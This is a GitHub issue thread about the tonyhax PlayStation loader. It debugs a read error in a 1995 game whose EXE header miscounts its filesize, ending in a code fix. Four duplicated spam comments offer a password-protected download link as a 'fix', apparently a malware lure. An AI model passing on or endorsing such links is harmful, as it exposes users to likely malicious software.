### ISSUE TITLE
Kileak, The Blood (Japan) - Read Error 2/9  (FIX FOUND)

### ISSUE THREAD

**Issue by alex-free** [socram8888/tonyhax#161]
I'm currently going through all of the PSX.EXE games, and I found one that doesn't boot in both Tonyhax v1.4.5 and Tonyhax International v1.5.2 The game is called "Kileak, The Blood (Japan) " and the redump page is here: http://redump.org/disc/14371/.

So what happens is we see this (Read error 2):
![tonyhax-v1 4 5](https://github.com/user-attachments/assets/1c61423a-3c31-4648-b77c-b1bdb4367ab8)

And strangely in my fork, Tonyhax International (Read error 9): 
![tonyhax-int-1 5 2](https://github.com/user-attachments/assets/0a98d185-bdab-4ee9-9d92-0711d55ccc42)

From no $ psx spx:

File Error Numbers for B(54h) and B(55h)
  00h okay (though many successful functions leave old error code unchanged)
  **02h file not found**
  06h bad device port number (tty2 and up)
 **09h invalid or unused file handle**
  10h general error (physical I/O error, unformatted, disk changed for old fcb)
  11h file already exists error (create/undelete/rename)
  12h tried to rename a file from one device to another device
  13h unknown device name
  16h sector alignment error, or fpos>=filesize, unknown seektype or ioctl cmd
  18h not enough free file handles
  1Ch not enough free memory card blocks
  FFFFFFFFh invalid or unused file handle passed to B(55h) function

OK, so what's going on? This is the exact code line that causes it to fail to boot:

https://github.com/socram8888/tonyhax/blob/d2036da6ba52bd42069b5876824a67f721a2f5f0/loader/secondary.c#L303

In a test, I commented out the return and it worked perfectly. But why? I also tried just booting the game in an emulator, without using tonyhax and it worked. So what gives?

Well, I modified something for a test. I did this to the line above essentially:

```
	debug_write("Loading executable (%d bytes @ %x)", exe_header->load_size, exe_header->load_addr);

	int32_t read_check = FileRead(exe_fd, exe_header->load_addr, exe_header->load_size);
    debug_write("Read %d bytes", read_check);

/*	if (FileRead(exe_fd, exe_header->load_addr, exe_header->load_size) != (int32_t) exe_header->load_size) {
		debug_write("Read error %d", GetLastError());
		return;
	}
*/

```

And.... it boots! This is the screen of my fork right before it starts successfully:

![works](https://github.com/user-attachments/assets/5b4c3fe0-ccc7-4a4e-b1ff-c6f38f5ad244)

Ignore the 'Fake MCPRO/SD2PSX detected in slot 1' and other differences related to me testing other things. Notice the:
`Read 641024 bytes`. What? That isn't '643072'. That's actually 2048 bytes less, exactly (one sector smaller).  The PSX.EXE file is 314 sectors (643072/2048) So why is it reading 313 sectors and then failing on the 314?

So I checked the file size of the executable, checks out at 643072 exactly.

![actual_exe_file_size](https://github.com/user-attachments/assets/0e960e8a-0ef4-4a01-87de-fbbddac9dff8)

And then, I looked at what the executable header says. We get the filesize from offset 0x1C, lets see what we have there:

![aha](https://github.com/user-attachments/assets/bf8bdbdb-2f0b-4c83-9c87-5055162e9e4f)

Okay, so we have 0x00, 0xD0, 0x09, 0x00. Reversing the order for endian-ness gives us 0x00, 0x09, 0xD0, 0x00 or the actual value, 0x9D000. Converting that to decimal gives us 643072. Okay? So what gives?

I decided to revisit no $ psx docs:

FILENAME.EXE (General-Purpose Executable)

PSX executables are having an 800h-byte header, followed by the code/data.

  000h-007h ASCII ID "PS-X EXE"
  008h-00Fh Zerofilled
  010h      Initial PC                   (usually 80010000h, or higher)
  014h      Initial GP/R28               (usually 0)
  018h      Destination Address in RAM   (usually 80010000h, or higher)
 **01Ch      Filesize (must be N*800h)    (excluding 800h-byte header)**
  020h      Data section Start Address   (usually 0)
  024h      Data Section Size in bytes   (usually 0)
  028h      BSS section Start Address    (usually 0) (when below Size=None)
  02Ch      BSS section Size in bytes    (usually 0) (0=None)
  030h      Initial SP/R29 & FP/R30 Base (usually 801FFFF0h) (or 0=None)
  034h      Initial SP/R29 & FP/R30 Offs (usually 0, added to above Base)
  038h-04Bh Reserved for A(43h) Function (should be zerofilled in exefile)
  04Ch-xxxh ASCII marker
             "Sony Computer Entertainment Inc. for Japan area"
             "Sony Computer Entertainment Inc. for Europe area"
             "Sony Computer Entertainment Inc. for North America area"
             (or often zerofilled in some homebrew files)
             (the BIOS doesn't verify this string, and boots fine without it)
  xxxh-7FFh Zerofilled
  800h...   Code/Data                  (loaded to entry[018h] and up)

Do you see it?   **The game developers forgot to exclude the header from the filesize in the PSX.EXE**.

I couldn't believe it. So on  [January 27th 1995](https://psxdatacenter.com/games/J/K/SLPS-00027.html) (29 years ago) this game shipped with an invalid filesize specified in the EXE header. Sony QA didn't catch it. No one ever noticed it for 29 years, because the Sony BIOS doesn't appear to check how many bytes it read before doing do_execute() (my guess anyways) and just powers through

So, easiest fix? Do as Sony (seemingly does). But with of course some additional error handling. 

```
	int32_t read_check = FileRead(exe_fd, exe_header->load_addr, exe_header->load_size);
    //debug_write("Read %d bytes", read_check);

	if( (read_check != (int32_t)exe_header->load_size) && ( (read_check + 2048) != (int32_t)exe_header->load_size) ) {
		debug_write("Read error %d", GetLastError());
		return;
	}
```

This will work if there is another game with the same exact issue as well.

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by rickdoq** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by KrissV2** [comment]
hi bro, to fix your trouble try this fix, i see it in another issue,
https://app.mediafire.com/dqajf1x14ccfd
password: changeme
when you installing it, you need to place a check in install to path and select usx

**Comment by socram8888** [comment]
Thanks for the report! https://github.com/socram8888/tonyhax/commit/33fd582ccfe4779a60235b5db8da58e0875e585c fixes it and adds even more checks, such as checking the executable's signature ("PS-X EXE")

**Comment by alex-free** [comment]
> Thanks for the report! [33fd582](https://github.com/socram8888/tonyhax/commit/33fd582ccfe4779a60235b5db8da58e0875e585c) fixes it and adds even more checks, such as checking the executable's signature ("PS-X EXE")

Very nice, changed my fork to do the same.
